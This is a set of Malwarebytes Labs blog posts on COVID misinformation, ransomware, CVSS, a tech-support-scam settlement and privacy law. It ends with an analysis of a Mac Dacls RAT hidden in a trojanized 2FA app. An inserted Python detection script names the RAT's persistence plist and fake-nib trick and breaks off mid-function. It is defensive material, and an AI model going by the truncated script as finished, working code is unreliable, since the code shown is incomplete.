The Security Blog From Malwarebytes

When the coronavirus infodemic strikes

Tue, 05/19/2020 - 15:15

Social media sites are stepping up their efforts in the war against misinformation… specifically, the coronavirus/COVID-19 infodemic. There’s a seemingly endless stream of potentially dangerous misinformation flying around online related to the COVID-19 pandemic, and that could have fatal results.

It’s boomtown in fake-news land riding high on the wave of people being left with their tech devices 24/7. I myself regularly see everything posted online from “hand gel is an immunizer” (nope) and “children can’t be affected” (not true) to “UK rules mean domestic abuse survivors have to stay with their abusive spouse” (absolutely not true at all and hugely dangerous to claim). 

We even have engineers being spat on thanks to conspiracy theories claiming that 5G is spreading the coronavirus. Turns out a global pandemic is a lightning rod for pushing people to conspiracy theories galore, to the extent that some folks have to go hunting for guides to wean their family members away from internet fakeouts. There are serious consequences taking shape, via every source imaginable—no matter how baffling.

What is being done to tackle these tall tales online?

YouTube: We begin with the video monolith, removing multiple “Coronavirus is caused by 5G” videos (one of which had more than 1.5m views) after an investigation by PressGazette. Some of the other clips about Bill Gates, the media, and related subjects came from verified accounts with large followings—often with adverts overlaid from advertisers who didn’t want their promotions associated with said content. While YouTube claims to have removed thousands of videos “since early February,” the video giant and many others are under intense pressure to take things up a notch or two.

While the top search results for “5G coronavirus” in YouTube currently bring back a variety of verified sources debunking the many conspiracy claims, filtering videos by what was posted “today” results in an assortment of freshly uploaded clips of people filming 5G towers and tagging them with “Coronavirus” in the titles. Should you see something specifically pushing a conspiracy theory, the report options are still quite generic:

  • Sexual content
  • Violent or repulsive content
  • Hateful or abusive content
  • Harmful or dangerous acts
  • Spam or misleading

While you’d likely select the last option, there’s still nothing specifically about the pandemic itself. This may be concerning, considering a recent study by BMJ Global Health found that one in four of the most popular videos about the pandemic contained misinformation. What that looks like is 62 million views across 19 dubious videos out of 69 popular videos from one single day. It’s quite concerning.

Twitter: This is an interesting one, as Twitter is looking to flag Tweets and/or accounts pushing bad information in relation to COVID-19. While this is a good move, it appears to be something done entirely at their end; if you try to flag a Tweet yourself as COVID-19 misinformation, there’s no option to do so in the reporting tab. “It’s suspicious or spam” and “It’s abusive or harmful” are the closest, but there’s nothing specific in the follow-up options tied to either of those selections.

This feels a bit like a missed opportunity, though there will be reasons why this isn’t available as an option. Perhaps they anticipate false flag and troll reporting of valid data, though one would hope their internal processes for flagging bad content would be able to counteract this possibility.

Facebook: The social media giant came under fire in April for their approach to the misinformation crisis, with large view counts, bad content not flagged as false, and up to 22 days for warnings to be issued, leading one campaign director at a crowdfunded activist group to claim they were “at the epicentre of the misinformation crisis.”


Facebook decided to start notifying users who’d interacted with what can reliably be called “the bad stuff” to try and push back on content rife in groups and elsewhere. Facebook continues to address the problem with multiple initiatives including tackling bad ads, linking people to credible information, and combating rogue data across multiple apps. The sheer size of their user base suggests this fight is far from over, though.

TikTok: Thinking that conspiracy theories and misinformation wouldn’t pop up on viral music/clip sensation TikTok is probably a bad idea. In some cases it’s flourished on the platform away from serious researcher eyes still focused on the big social media platforms such as Twitter and Facebook.

While TikTok is somewhat unique in having COVID-19 misinformation as a specific reporting category, it’s not exactly been plain sailing. Popular hashtag categories seemingly have more than their fair share of bad content, tying bad data and poorly sourced claims to cool songs and snappy soundbites.

Internet Archive: Even the Internet Archive isn’t safe from coronavirus shenanigans, as people use saved pages to continue spreading bad links online. Even if a bad site is taken down, flagged as harmful, or removed from search engines, the act of scooping it up and placing it in the archive forevermore is a way for the people behind the sites to keep pushing those links. For their part, the Internet Archive is fighting back with clear warning messages on some of the discredited content.

Beware a second Infodemic wave

Although some major online platforms were slow to respond to the bogus information wave, most of them now seem to at least have some sort of game plan in place. It’s debatable how much of it is working, but something is likely better than nothing and tactics continue to evolve in response to those hawking digital shenanigans.

However, it seems at least some warnings of the present so-called Infodemic were not heeded across many years, and now we’re reaping the whirlwind. From governments and healthcare organisations to the general public and online content sharing platforms, we’ve all been caught on the back foot to various degrees. While the current genie is out of the bottle and won’t be going back in anytime soon, it’s up to all of us to think how we could do it better next time—because there will absolutely be a next time.

The post When the coronavirus infodemic strikes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 11 – May 17)

Mon, 05/18/2020 - 15:28

Last week on Malwarebytes Labs, we explained why RevenueWire has to pay $6.7 million to settle FTC charges, how CVSS works: characterizing and scoring vulnerabilities, and we talked about how and why hackers hit a major law firm with Sodinokibi ransomware.

We also launched another episode of our podcast Lock and Code, this time speaking with Chris Boyd, lead malware intelligence analyst at Malwarebytes, about facial recognition technology—its early history, its proven failures at accuracy, and whether improving the technology would actually be “good” for society.

Other cybersecurity news
  • A new attack method was disclosed that targets devices with a Thunderbolt port, allowing an evil maid attack. (Source: SecurityWeek)
  • Almost four million users of MobiFriends, a popular Android dating app, have had their personal and log-in data stolen by hackers. (Source: IT Security Guru)
  • Cognizant estimates that the April ransomware attack that affected its internal network will cost the IT services firm between $50 and $70 million. (Source: GovInfoSecurity)
  • The database for the defunct hacker forum WeLeakData is being sold on the dark web and exposes the private conversations of hackers who used the site. (Source: BleepingComputer)
  • The U.S. government released information about three new malware strains used by state-sponsored North Korean hackers. (Source: The Hacker News)
  • Details were published about PrintDemon, a vulnerability in the Windows printing service that impacts all Windows versions going back to Windows NT 4. (Source: ZDNet)
  • US intel agencies expressed the need for a concerted campaign to patch for the top 10 most exploited vulnerabilities. (Source: CBR online)
  • Magellan Health, the Fortune 500 insurance company, has reported a ransomware attack and a data breach. (Source: ThreatPost)
  • Researchers found a new cyber-espionage framework called Ramsay, developed to collect and exfiltrate sensitive files from air-gapped networks. (Source: DarkReading)
  • The EFF called attention to the many ways in which the EARN IT Act would be a disaster for Internet users’ free speech and security. (Source: Electronic Frontier Foundation)

Stay safe, everyone!


Sodinokibi drops greatest hits collection, and crime is the secret ingredient

Thu, 05/14/2020 - 15:30

When a group of celebrities ask to speak with their lawyer, they usually don’t have to call in a bunch of other people to go speak with their lawyer. However, in this case it may well be a thing a little down the line. A huge array of musicians including Bruce Springsteen, Lady Gaga, Madonna, Run DMC and many more have had documents galore pilfered by the Sodinokibi gang.

Around 756GB of files including touring details, music rights, and correspondence were stolen – some of which was sitting pretty on a site accessible through Tor as proof of the sticky-fingered shenanigans. The law firm affected is Grubman Shire Meiselas & Sacks, a major player handling huge contracts for global megastars on a daily basis. Although they handle TV stars, actors, sports personalities and more, so far the only data referenced online appears to be in relation to singers/songwriters.


The assumption is the data is being displayed as a preview of things to come; pay a ransom, or the data gets it (and by gets it, we mean “everything is published online in disastrous fashion”). The Sodinokibi gang are not to be trifled with, having already brought the walls crashing down upon Travelex not so long ago.

Hot targets…

Legal firms are becoming a hot target for malware-focused criminals as they realise the value of the data they’re sitting on. Break in, exfiltrate the files, then send a few ransom notes to show them you A) have the files and B) mean business. If they refuse to pay up, drop the files and walk away from the inevitable carnage of reputational damage + compromised clients.

Who or what is Sodinokibi?

Put simply, a devastatingly successful criminal group with a penchant for Ransomware, data theft, and extortion. Sporting a popular Ransomware as a Service business model, they spiked hard in May of 2019 with a ramp-up in attacks on business and (to some degree) consumers. Their ransomware went a long way to filling the void left by GandCrab group’s “retirement,” and multiple, smaller spikes took place until an eventual decline for both consumer and business towards the end of July.

There were six versions of Sodinokibi released into the wild between April and July alone, helping to keep the security industry and targets on their toes over a very condensed period. Vulnerabilities, phishing campaigns using malicious links, malvertising, and even compromised MSPs were all used to help launch the ransomware waves. You should absolutely lock down your MSP, by the way.

Technical details on the attack?

This is a breaking story and for various reasons the affected parties aren’t going to spill the beans just yet, especially with investigations ongoing. Having said that, there’s every probability they used ransomware to get the job done and that this was a targeted attack. How is Sodinokibi ransomware faring at the moment?

Sodinokibi ransomware statistics

This likely isn’t part of any huge spam wave. Our monthly data for consumer and business shows the last big spike in Ransom.Sodinokibi back in December:

Overall detections for months in 2019 and 2020

Business detections hovered between 200 to 280 from September to November 2019, before exploding over December to just under 7,000. It quickly dropped back down to 260 in February 2020, with a slight spike of 1,447 in April.

Consumer, meanwhile, followed a slightly more convoluted path with a peak of just over 600 in November 2019, and numbers ranging from 293 in July 2019 to 228 in March 2020 and generally low numbers elsewhere (76 in August 2019, 70 in December 2019, and 109 in April 2020).

In conclusion, then, ensure your ransomware armory is fully stocked and ready to go should you be sitting on lots of incredibly valuable entertainer documents, or indeed anything at all. Whether hit by random attacks or targeted mayhem, the end result is still the same: lots of headaches, and quite a few calls to legal.

Or, in this case, many calls to legal.


How CVSS works: characterizing and scoring vulnerabilities

Wed, 05/13/2020 - 15:30

The Common Vulnerability Scoring System (CVSS) provides software developers, testers, and security and IT professionals with a standardized process for assessing vulnerabilities. You can use the CVSS to assess the threat level of each vulnerability, and then prioritize mitigation accordingly.

This article explains how the CVSS works, including a review of its components, and describes the importance of using a standardized process for assessing vulnerabilities.

What is a software vulnerability?

A software vulnerability is any weakness in the codebase that can be exploited. Vulnerabilities can result from a variety of coding mistakes, including faulty logic, inadequate validation mechanisms, or lack of protection against buffer overflows. Unprotected APIs and issues contributed by third-party libraries are also common sources of vulnerabilities.

Regardless of the source of the vulnerability, all present some risk to users and organizations. Until vulnerabilities are discovered and patched, or fixed in a software update, attackers can exploit them to damage systems, cause outages, steal data, or deploy and spread malware.

How vulnerabilities are reported

The way in which vulnerabilities are reported depends on the type of software they are discovered on and the type of vulnerability they appear to be. In addition, the perceived importance of the vulnerability to the finder is a factor in how it’s reported.

Typically, vulnerabilities are found and reported by security researchers, penetration testers, and users themselves. Security researchers and penetration testers may work full-time for organizations or they may function as freelancers working under a bug bounty program.

When vulnerabilities are minor or can be easily fixed by the user without vendor or community help, issues are more likely to go unreported. Likewise, if a severe issue is discovered by a black hat researcher, or cybercriminal, it may not be reported. Generally, however, vulnerabilities are reported to organizations or developers when found.

If a vulnerability is found in proprietary software, it may be reported directly to the vendor or to a third-party oversight organization, such as the non-profit security organization, MITRE. If one is found in open-source software, it may be reported to the community as a whole, to the project managers, or to an oversight group.

When vulnerabilities are reported to a group like MITRE, the organization assigns the issue an ID number and notifies the vendor or project manager. The responsible party then has 30 to 90 days to develop a fix or patch the issue before the information is made public. This reduces the chance that attackers can exploit the vulnerability before a solution is available.

What is CVSS?

The Common Vulnerability Scoring System (CVSS) is a set of free, open standards. These standards are maintained by the Forum of Incident Response and Security Teams (FIRST), a non-profit security organization. The standards use a scale of 0.0 to 10.0, with 10.0 representing the highest severity. The most recent version released is CVSS 3.1, released in June 2019.

These standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.

How CVSS scoring works

CVSS scoring is based on a combination of several subsets of scores. The only requirement for categorizing a vulnerability with a CVSS is the completion of the base score components. However, it is recommended that reporters also include temporal scores and environmental metrics for a more accurate evaluation.

The base score of the CVSS is assessed using an exploitability subscore, an impact subscore, and a scope subscore. The exploitability subscore contains metrics describing how an attack can be carried out, the impact subscore measures the importance of the impacted data and systems, and the scope subscore assesses the impact of the attack on seemingly unaffected systems.

Base score

The base score is meant to represent the inherent qualities of a vulnerability. These qualities should not change over time nor should qualities be dependent on individual environments. To calculate the base score, reporters must calculate the composite of three subscores.

Exploitability subscore

The exploitability subscore measures the qualities of a vulnerable component. These qualities help researchers define how easily a vulnerability can be exploited by attackers. This subscore is composed of the following metrics:

  • Attack vector (AV): how easy it is for attackers to access a vulnerability. Scale (low to high): Physical (presence), Local (presence), Adjacent (connected networks), Network (remote).
  • Attack complexity (AC): what prerequisites are necessary for exploitation. Scale: Low, High.
  • Privileges required (PR): the level of privileges needed to exploit the vulnerability. Scale: None, High.
  • User interaction (UI): whether exploitation requires actions from a tertiary user. Scale: binary, either None or Required.

Impact subscore

The impact subscore measures the effects that successful exploitation has on the vulnerable component. It defines how a component is affected based on the change from pre to post exploit. This subscore is composed of the following metrics:

  • Confidentiality (C): loss of data confidentiality in the component or wider systems. Scale: None, High.
  • Integrity (I): loss of data integrity throughout the component system. Scale: None, High.
  • Availability (A): loss of availability of the component or attached systems. Scale: None, High.

Scope subscore

The scope score measures what impact a vulnerability may have on components other than the one affected by the vulnerability. It tries to account for the overall system damage that an attacker can execute by exploiting the reported vulnerability. This is a binary scoring with scope being changed or unchanged.

Temporal score

The temporal score measures aspects of the vulnerability according to its current status as a known vulnerability. This score includes the following metrics:

  • Exploit code maturity (E): the availability of tools or code that can be used to exploit the vulnerability. Scale (low to high): Proof of concept, Not defined.
  • Remediation level (RL): the level of remediation currently available to users. Scale: Official fix, Temporary fix, Not defined.
  • Report confidence (RC): the degree of accuracy of the vulnerability report. Scale: Unknown, Not defined.

Environmental metrics

Environmental metrics measure the severity of the vulnerability adjusted for its impact on individual systems. These metrics are customizations of the metrics used to calculate the base score. Environmental metrics are most useful when applied internally by security teams calculating severity in relation to their own systems.

The importance of standardization

CVSS provides comprehensive guidelines for assessing vulnerabilities. This scoring system is used by many and has a wide range of applications. However, perhaps the most important aspect of the CVSS is that it provides a unified standard for all relevant parties. Standardization is crucial when responding to risks and prioritizing mitigation.

CVSS scores are more than just a means of standardization. These scores have practical applications and can have a significant impact in helping security teams and product developers prioritize their efforts. 

Within an organization, security teams can use CVSS scores to efficiently allocate limited resources. These resources may include monitoring capabilities, time devoted to patching, or even threat hunting to determine if a vulnerability has already been exploited. This is particularly valuable for small teams who may not have the resources necessary to address every vulnerability.

CVSS scores can also be useful for security researchers. These scores can help highlight components that are especially vulnerable or tactics and tools that are particularly effective. Researchers can then apply this knowledge to developing new security practices and tools to help detect and eliminate threats from the start. 

Finally, CVSS scores can be informative for developers and testers in preventing vulnerabilities in the first place. Careful analysis of high-ranking vulnerabilities can help software development teams prioritize testing. It can also help highlight areas where code security best practices can be improved. Rather than waiting until their own product is discovered to be vulnerable, teams can learn from others’ mistakes.


RevenueWire to pay $6.7 million to settle FTC charges

Tue, 05/12/2020 - 15:30

What can you do as a scammer when no legitimate payment provider wants to process your payments anymore? Or, what if you are growing sick and tired of these same payment providers reimbursing disgruntled customers who claim that your products didn’t fix computers, like—you know—you said they would?

Simple. You rely on some novel help. That is, until you get caught.

Let us tell you a story of intrigue and wrongdoing that resulted in a multi-million-dollar settlement issued by the US Federal Trade Commission.

How do tech support scammers work?

Some of the worst internet criminals are those who prey on the weakest groups in our society. Communities that are uncomfortable and less experienced with computers are already at a disadvantage, and tech support scammers make shameless use of these circumstances, demanding payments for bogus solutions to entirely non-existent tech problems. First comes the hook: There is something wrong with your computer. Then comes the sell: Only we can fix it.

But that money stream can dry up because of a legitimate link in the chain—payment processors. Scammers may first receive services from legitimate payment processors, but soon those providers will notice a high volume of complaints and wise up to the actions of their customer, consequently kicking them out and warning their colleagues to stay away from said customer.

It’s a real problem for many tech support scammers, and one that has pushed some into even accepting gift cards as payment, just to circumvent the problem that they were refused by practically every payment provider.

But for a small group of call centers and software makers recently investigated by the FTC, there was a better option than gift cards.

Enter RevenueWire Inc., a Canadian company doing business as “SafeCart.”

Solution: start your own payment provider

The setup was clever.

First, RevenueWire entered into contracts with banks and payment processors in the US in order to obtain and open merchant accounts, thus allowing it to accept debit and credit payments. RevenueWire then entered into contracts with tech support call centers with a less-than-stellar track record. Further, according to the FTC, RevenueWire worked with separate, third-party software companies, including PC Cleaner Inc. and Boost Software Inc., which would direct consumers of their own software to any tech support call centers that were now working with RevenueWire.

In essence, RevenueWire engaged in a miniature, controlled economy, gaining vast insight into an entire ecosystem that included making software, selling it, providing tech support services, and funneling payments made along the way.

This made for a complete alignment of businesses. According to the FTC, the stakeholders in this organization closely cooperated with and participated in companies that acted as telemarketers, software builders, website designers, and call center operators. Plus, they now had their own payment provider.

What they did

The organization’s objective, according to the FTC, was to swindle customers out of their money while pretending to be tech support operators.

When you are a tech support scammer there are three main angles you can work to get your “clients” to call you. Calling the clients and trying to sell them your services is one method, and they didn’t shy away from it. But as you can imagine, the chances of deceiving a client are much higher when you get a client to actually call you. To achieve this, tech support scammers can:

  • Pretend to represent a legitimate company, where Microsoft and Apple are probably the most well-known examples. But Malwarebytes has been the victim of impersonation a few times as well.
  • Use advertising to get prospects to visit websites with the number you want them to call, to the degree of using browser lockers and fake online scanners to convince the visitor their computer has serious issues, that only you know how to solve—at a steep price.
  • Release fake anti-malware software that prominently displays your number as a help resource. Again, this convinces users that they need to buy the software to fix those problems, and probably some extra services to go with it.

In the case at hand, the tech support call centers working with RevenueWire were run by Vast Tech Support, LLC (“Vast”) and Inbound Call Experts, LLC (“ICE”). The FTC filed legal actions against both these companies in the past.

What charges did RevenueWire receive?

RevenueWire was charged under the accusation that they laundered credit card payments for, and assisted and facilitated, two tech support scams previously sued by the FTC. You guessed it, those two tech support scammers were Vast and ICE.

As Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a news release when the settlement was announced:

“Finding ways to get paid – without getting caught – is essential for scammers who steal money from consumers. And that’s exactly what RevenueWire did for tech support scammers when it laundered their transactions through the credit card system.”

The FTC said that RevenueWire violated the Federal Trade Commission Act, which prohibits “unfair or deceptive acts or practices in or affecting commerce.” RevenueWire also, according to the FTC, violated the Telemarketing Sales Rule, “provided substantial assistance and support to one or more sellers or telemarketers, whom they knew, or consciously avoided knowing, were violating” sections of the Telemarketing Sales Rule, and “submitted charges through RevenueWire’s merchant account for companies that made false statements to consumers.”

What about the people that worked for RevenueWire?

Only a few people that worked at RevenueWire knew about the complete business model. Most of the employees never learned—and may have been shocked to learn—about the company’s true nature when it was named in the FTC settlement. Some may have figured out what was going on while they were working for RevenueWire, but almost no one was told up front. A fraud analyst working for RevenueWire repeatedly warned executives about dealings with “crooks,” according to evidence published in the FTC’s report. This information was directly shared with Roberta Leach, RevenueWire’s CEO and a named defendant in the FTC case.

The good news

In a recent press release, the FTC announced that RevenueWire and its CEO, Roberta Leach, will pay $6.75 million to settle charges that they laundered credit card payments for, and assisted and facilitated, two tech support scams previously shut down by the FTC.

The FTC stipulated:

“Consumers throughout the country have been injured by tech support scams in which fraudsters deceptively market services to ‘fix’ purported problems on consumers’ computers. The FTC and state law enforcers have brought cases against the software sellers and call centers involved in these scams, including call centers operated by Vast Tech Support, LLC (‘Vast’) and Inbound Call Experts, LLC (‘ICE’). FTC v. Boost Software, Inc., No. 14-81397 (S.D. Fla. filed Nov. 10, 2014); FTC v. Inbound Call Experts, LLC, No. 14-81395 (S.D. Fla. filed Nov. 10, 2014). RevenueWire, Inc. and its Chief Executive Officer (collectively, ‘Defendants’) have played a key role in many of these scams, including the Vast and ICE scams. Using a business model named ‘Call Stream,’ the Defendants have provided lead generation, business development, payment processing, and money distribution services to numerous tech support fraudsters, leading to hundreds of millions of dollars of consumer injury.”

We are pleased to learn that the FTC successfully went after this enabler and payment provider, especially in this case as they knew what they were doing and the FTC could build on the cases where they ruled against the scammers themselves.

Malwarebytes’ fight against tech support scammers

Malwarebytes has been involved in the fight against tech support scammers ever since the beginning of our company, even though it is not something that results in a profit for us. We feel that tech support scammers give the industry a bad name by proxy and as pointed out earlier, some of them even pretend to represent our company. Also, we care about everyone’s safety, not just the safety of our paying customers.

If you want to be sure to get help from our actual support team, don’t contact just any number you find while searching, but reach out to us through our Support portal.

Stay safe, everyone, and remain vigilant!


Lock and Code S1Ep6: Recognizing facial recognition’s flaws with Chris Boyd

Mon, 05/11/2020 - 15:15

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chris Boyd, lead malware intelligence analyst at Malwarebytes, about facial recognition technology—its early history, its proven failures at accuracy, and whether improving the technology would actually be “good” for society.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.


Stay safe, everyone!


Data privacy law updates eyed by Singapore

Thu, 05/07/2020 - 15:15

In early 2019, Singapore’s data privacy regulators proposed that the country’s data privacy law could use two new updates—a data breach notification requirement and a right of data portability for the country’s residents.

The proposed additions are commonplace in several data privacy laws around the world, including, most notably, the European Union General Data Protection Regulation, or GDPR, a sweeping set of data protections that came into effect two years ago.

If Singapore approves its two updates, it would be the latest country in a long line of other countries to align their own data privacy laws with GDPR.

The appeal is clear: Countries that closely hew their own data privacy laws to GDPR have a better shot at obtaining what is called an “adequacy determination” from the European Commission, meaning those countries can legally transfer data between themselves and the EU.

Such a data transfer regime is key to engaging in today’s economy, said D. Reed Freeman Jr., cybersecurity and privacy practice co-chair at the Washington, D.C.-based law firm Wilmer Cutler Pickering Hale and Dorr. If anything, the proposed appeal to GDPR is as much an economic decision as it is one of data privacy rights.

“The world’s economy depends on data flows, and the more restrictive the data flows are, the better,” Freeman said. “Multinational [organizations] in Singapore would like to have an adequacy determination.”

Singapore’s Personal Data Protection Act

On October 15, 2012, Singapore passed its data protection law, the Personal Data Protection Act (PDPA), putting into place new rules for the collection, use, and disclosure of personal data. The PDPA did two other things. It created a national “Do Not Call” register and it established the country’s primary data protection authority, the Personal Data Protection Commission.

For years, the Personal Data Protection Commission has issued warnings to organizations that violate the country’s data protection law, publishing their decisions for the public to read. It is the same commission responsible for the current attempts to update the law.

Today, Singaporeans enjoy some of the same data protection rights found in the European Union and even in California.

For starters, Singaporeans have the right to request that an organization hand over any personal data that belongs to them. Further, Singaporeans also have the right to correct that personal data should they find any errors or omissions.

Singapore’s data privacy law also includes restrictions for how organizations collect, use, or disclose the personal data of Singaporeans.

According to the PDPA, organizations must obtain “consent” before collecting, using, or disclosing personal data (more on that below). Organizations must also abide by “purpose” limitations, meaning that they can “collect, use or disclose personal data about an individual only for purposes that a reasonable person would consider appropriate in the circumstances and, if applicable, have been notified to the individual concerned.” Organizations must notify individuals about planned collection, use, and disclosure of personal data, and collected personal data must be accurate.

Further, any personal data in an organization’s possession must be protected through the implementation of “reasonable security arrangements to prevent unauthorized access, collection, use, disclosure, copying, modification, disposal or similar risks.” And organizations also have to “cease to retain” documents that contain personal data, or “remove the means by which the personal data can be associated with particular individuals” after the purpose for collecting personal data ends.

While these rules sound similar to GDPR, there are discrepancies—including how Singapore and the EU approach “consent.” In Singapore’s PDPA, consent is not required to collect personal data when that data is publicly available, is necessary for broadly defined “evaluative purposes,” or collected solely for “artistic or literary purposes.” In the EU, there are no similar exceptions.

Two other areas where the laws differ are, of course, data portability and data breach notification requirements. Singapore’s law has none.

Proposed data privacy additions

On February 25, 2019, Singapore’s Personal Data Protection Commission published a “discussion paper” on data portability, explaining the benefits of adding a data portability requirement to the PDPA.

“Data portability, whereby users are empowered to authorize the movement of their personal data across organizations, can boost data flows and support greater data sharing in a digital economy both within and across sectors,” the PDPC said in a press release.

With a right to data portability, individuals can request that organizations hand over their personal data in a format that lets them easily move it to another provider and basically plug it in for immediate use. Think of it like taking your email contacts from one email provider to another, but on a much larger scale and with potentially less value—it’s not like your Facebook status updates from 2008 will do you much good on Twitter today.

Less than one week after publishing its data portability discussion paper, the Personal Data Protection Commission also announced plans to add a data breach notification requirement to the PDPA.

The Personal Data Protection Commission proposed that if organizations suffered a data breach that potentially harmed individuals, those individuals and the PDPC itself would need to be notified. Further, even if a data breach brought no potential harm to individuals, organizations would need to notify the PDPC if more than 500 people’s personal data was affected.

Following public consultations, the data portability requirement was well-received.

Why attempt data privacy updates now?

Aligning a country’s data protection laws with the protections provided in GDPR is nothing new, and in fact, multiple countries around the world are currently engaged in the same process. But Singapore’s timing could potentially be further pinned down to another GDPR development in early January of 2019—an adequacy determination granted by the European Commission to another country, Japan.

Wilmer Hale’s Freeman said it is likely that Singapore looked to Japan and wanted the same.

“[Singapore] is competing in the Asia market and in the global market, and I would suspect that the leaders in Singapore saw what happened in Japan, asked the relevant people at the Commission, ‘What do we need to do to get that?’ and were told ‘If you line up [PDPA] pretty close, we have a good chance of getting an adequacy determination.’” Freeman said.

Freeman explained that, in recent history, obtaining an adequacy determination relies on whether a country’s data protection laws are similar to GDPR.

“Over time, it’s been sort of short-hand thought of as ‘adequacy’ means something close to ‘equivalent,’” Freeman said.

As to the importance, Freeman explained that any multinational business that wants to move data between its home country and the EU must, per the rules of GDPR, obtain an adequacy determination. No determination, no legal opportunity to engage in the world’s economy.

“If you’re a multinational company and you have employees and customers in Europe, and you want to store the data at the home office in Singapore, you need a lawful basis to do that,” Freeman said. An adequacy determination is that legal basis, Freeman said, and it’s far more difficult to “undo” an adequacy determination than it is a bilateral agreement, like the one between the EU and the United States struck down by the Court of Justice of the European Union.

Don’t reinvent the data privacy wheel

Singapore has not proposed a time frame for when it wants to finalize the data portability rights and data breach notification requirements. Nor has it specified the actual regulations it would put in place—including how long before the Personal Data Protection Commission would enforce the new requirements, or what those enforcement actions would entail.

Freeman suggested that when the Singaporean government clarifies its proposals, it look to its neighbors across the world who have grappled with the same questions on data breach notifications and data portability.

For data portability, Freeman explained that many large corporations have already struggled to comply with the rules both in GDPR and in the California Consumer Privacy Act, not because of an inability to do so, but because providing such in-depth data access to individuals requires understanding all the places where an individual’s personal data can live.

“Is it stored locally? On servers in different places? Is it in email? In instant messaging? On posts?” Freeman said.

For data breach notification requirements, Freeman also said that it makes little sense to create something “out of whole cloth” that will create new burdens on multinational businesses that already have to comply with the data breach notification requirements in GDPR and in the 50 US states.

It’s better to find what currently works, Freeman said, and borrow.

The post Data privacy law updates eyed by Singapore appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app

Wed, 05/06/2020 - 15:59

This blog post was authored by Hossein Jazi, Thomas Reed and Jérôme Segura.

We recently identified what we believe is a new variant of the Dacls Remote Access Trojan (RAT) associated with North Korea’s Lazarus group, designed specifically for the Mac operating system.

Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.

This Mac version is at least distributed via a Trojanized two-factor authentication application for macOS called MinaOTP, mostly used by Chinese speakers. Similar to the Linux variant, it boasts a variety of features including command execution, file management, traffic proxying and worm scanning.


On April 8th, a suspicious Mac application named “TinkaOTP” was submitted to VirusTotal from Hong Kong. It was not detected by any engines at the time.

The malicious bot executable is located in the “Contents/Resources/Base.lproj/” directory of the application and pretends to be a nib file (“SubMenu.nib”) while it is actually a Mac executable. It contained the strings “c_2910.cls” and “k_3872.cls”, which are the names of the certificate and private key files that had been previously observed.


This RAT persists through LaunchDaemons or LaunchAgents, which take a property list (plist) file that specifies the application to be executed after reboot. The difference between LaunchAgents and LaunchDaemons is that LaunchAgents run code on behalf of the logged-in user, while LaunchDaemons run code as the root user.

When the malicious application starts, it creates a plist file with the “com.aex-loop.agent.plist” name under the “Library/LaunchDaemons” directory. The content of the plist file is hardcoded within the application.

The program also checks if “getpwuid(getuid())” returns the user id of the current process. If a user id is returned, it creates the plist file “com.aex-loop.agent.plist” under the LaunchAgents directory: “Library/LaunchAgents/”.

Figure 1: Plist file

The file name and directory to store the plist are in hex format and appended together. They show the filename and directory backwards.
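As an added defensive example (not code from the Malwarebytes write-up), the following Python hunts for the two artefacts described above: a .nib entry under Contents/Resources/*.lproj that is really a Mach-O executable, and the com.aex-loop.agent.plist persistence file in either launch directory. The bundle layout, plist Label, program path and file bytes in the fixture are constructed for the demonstration.

```python
import plistlib
import tempfile
from pathlib import Path

# Mach-O magic numbers (32/64-bit, both byte orders) plus the universal/fat header.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}

# Persistence artefact named in the write-up, looked up in both launch directories.
DACLS_PLIST = "com.aex-loop.agent.plist"
LAUNCH_DIRS = ("Library/LaunchDaemons", "Library/LaunchAgents")


def is_macho(path: Path) -> bool:
    """True if the file starts with a Mach-O or universal-binary magic."""
    try:
        with path.open("rb") as fh:
            return fh.read(4) in MACHO_MAGICS
    except OSError:
        return False


def find_fake_nibs(app_bundle: Path) -> list:
    """.nib entries under Contents/Resources/<lang>.lproj that are really executables.

    A genuine nib is a plist archive or a directory and is never Mach-O, so the
    magic check alone separates a SubMenu.nib-style decoy from real UI resources.
    """
    resources = app_bundle / "Contents" / "Resources"
    return [p for p in resources.glob("*.lproj/*.nib") if p.is_file() and is_macho(p)]


def find_dacls_plists(root: Path) -> list:
    """(plist path, launched program) for com.aex-loop.agent.plist under root.

    On a real host run with root=Path("/") for LaunchDaemons and root=Path.home()
    for the per-user LaunchAgents copy written when getpwuid(getuid()) succeeds.
    """
    hits = []
    for sub in LAUNCH_DIRS:
        plist = root / sub / DACLS_PLIST
        if not plist.is_file():
            continue
        try:
            with plist.open("rb") as fh:
                data = plistlib.load(fh)
            program = data.get("Program") or " ".join(data.get("ProgramArguments", []))
        except Exception:  # malformed content under that name is itself worth reporting
            program = "<unparseable plist>"
        hits.append((plist, program))
    return hits


def build_sample(root: Path) -> Path:
    """Constructed fixture (assumed values, not from the sample): a bundle with a
    Mach-O posing as SubMenu.nib, a benign nib, and the persistence plist."""
    app = root / "TinkaOTP.app"
    lproj = app / "Contents" / "Resources" / "Base.lproj"
    lproj.mkdir(parents=True)
    # 64-bit little-endian Mach-O magic followed by filler bytes.
    (lproj / "SubMenu.nib").write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
    # A benign nib is just a (binary) plist archive.
    (lproj / "MainMenu.nib").write_bytes(
        plistlib.dumps({"$archiver": "NSKeyedArchiver"}, fmt=plistlib.FMT_BINARY))
    agents = root / "Library" / "LaunchAgents"
    agents.mkdir(parents=True)
    (agents / DACLS_PLIST).write_bytes(plistlib.dumps({
        "Label": "com.aex-loop.agent",          # assumed label
        "ProgramArguments": [str(root / "Library" / ".mina")],
        "RunAtLoad": True,
    }))
    return app


def hunt_on_sample() -> dict:
    """Build the fixture in a temp dir, run both checks and return a summary."""
    root = Path(tempfile.mkdtemp())
    app = build_sample(root)
    return {
        "fake_nibs": [p.name for p in find_fake_nibs(app)],
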